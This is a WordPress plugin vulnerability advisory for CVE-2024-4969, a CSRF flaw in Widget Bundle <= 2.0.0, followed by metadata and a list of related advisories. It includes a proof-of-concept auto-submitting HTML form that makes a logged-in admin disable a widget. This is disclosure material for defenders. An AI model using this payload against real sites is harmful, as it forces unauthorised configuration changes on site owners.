Widget Bundle <= 2.0.0 – Widget Disable/Enable via CSRF | CVE 2024-4969 | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks when logging Widgets, which could allow attackers to make logged in admin enable/disable widgets via a CSRF attack

Proof of Concept

This PoC disables the User Registration widget. To do so, make a logged in admin open an HTML file containing:


```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=widget-bundle" method="post">
        <input type="hidden" name="widget_options[widget_types][widget_login_register]" value="0" />
        <input type="hidden" name="widget_types_submit" value="Save" />
        <input type="submit" value="Submit" />
    </form>
</body>
```

Affects Plugins

wp-widget-bundle

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

1a7ec5dc-eda4-4fed-9df9-f41d2b937fed

Timeline

Publicly Published

2024-05-31 (about 1 year ago)

Added

2024-05-31 (about 1 year ago)

Last Updated

2024-05-31 (about 1 year ago)

Other

Published

Title

Published

2023-04-24

Title

Side Cart Woocommerce < 2.2 - Settings Reset via CSRF

Published

2025-04-09

Title

ChillPay WooCommerce < 2.6.0 - Stored XSS via CSRF

Published

2023-08-17

Title

CLUEVO LMS, E-Learning Platform < 1.11.0 - Settings Update via CSRF

Published

2023-05-15

Title

WooCommerce Product Add-ons < 6.2.0 - Cross-Site Request Forgery

Published

2025-12-06

Title

PDF Thumbnail Generator < 1.5 - Cross-Site Request Forgery